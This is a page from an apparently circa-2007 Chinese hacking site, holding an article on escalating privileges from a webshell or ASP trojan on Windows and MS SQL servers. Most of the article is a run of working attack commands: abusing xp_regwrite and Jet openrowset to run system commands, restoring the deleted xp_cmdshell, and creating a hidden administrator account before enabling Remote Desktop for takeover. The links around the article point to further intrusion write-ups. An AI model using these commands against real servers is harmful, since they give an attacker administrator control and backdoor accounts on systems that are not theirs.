·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]webshell提权与asp木马提权

热荐 ★★★★★

webshell提权与asp木马提权

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-9-4 16:43:06

把132提升权限

后面就用sql的cmd shell你想干什么就干什么吧.其实也可以windows下提权工具也很多.
SA权限仅需xp_regwrite即可有dos shell
删除xp_cmdshell和xplog70.dll不用担心，只要保留xp_regwrite就可以执行系统命令，拥有一个dos shell
利用RDS的一个老问题，在IIS 4.0的时候被广泛利用，现在好像没多少人想得起来了
绝对比去想办法恢复xp_cmdshell来得经济实惠，不过需要猜一下系统路径
nt/2k: x:\winnt\system32\
xp/2003: x:\windows\system32\
如果有回显，可以看到执行返回结果，否则需要先判断主机OS类型再试
当然如果野蛮一点，四个轮流来一遍也行。

首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE''SOFTWARE\Microsoft\Jet\4.0\Engines''SandBoxMode''REG_DWORD'1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0'';database=c:\winnt\system32\ias\ias.mdb''select shell("cmd.exe /c net user admin admin1234 /add")')

扩展储存过程被删除以后可以有很简单的办法恢复：
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复，不用去管sp_addextendedproc是不是存在

-----------------------------

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell

asp木马提权

net user 查看是否有cmd的权限
如果没有用海洋2005配合上传的cmd.exe来执行
假如:上传一个工具ftp.exe 具体的路径是：D:\mine\ftp.exe
现在加个管理员帐号命令是 D:\mine\ftp.exe "net user mackson$ mackson /add"
现在我们来把mackson这个帐号提升为管理员````
这里是命令D:\mine\ftp.exe"net localgroup administrators mackson$ /add"
现在我们来看看mackson 这个帐号的资料命令： net user mackson$
如果是管理员的话，现在我们主要是去开他3389 然后终端连接
我们传个3389.exe去
D:\mine\3389.exe这就是开33898终端服务的工具路径了````
上传开启3389的软件地址：D:\mine\3389.exe
我们只要在CMD里面输入D:\mine\ftp.exe "D:\mine\3389.exe"
现在只需要在CMD命令输入里面输入上面的命令 然后回车就可以开他3389 了
服务器重启中。。。。。
重启后，打开远程桌面连接。。。

上一页 [1] [2] [3]

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章： MSSQL差异备份取系统权限(带演示动画)

下一篇文章：在台湾某内网穿行

【字体：小大】

中介交易区

一次通过 Oracle8i 入侵系统之旅	03-21
SA权限下的思路变通	03-18
有防火墙的网站整个入侵过程	01-21
绕过Xplog70.dll玩入侵	01-14
一步一步的入侵----only for you	01-09
入侵中快速获得Web根目录的技巧	01-09
记一次对RedHat Linux系统的安全	01-08
介绍几个小工具和入侵的技法(2)	01-08
有防火墙的网站整个入侵过程	01-04
拐弯入侵虚拟主机	01-04
由一次入侵实例看虚拟主机系统的	01-02
解读IDS入侵检测系统术语	01-02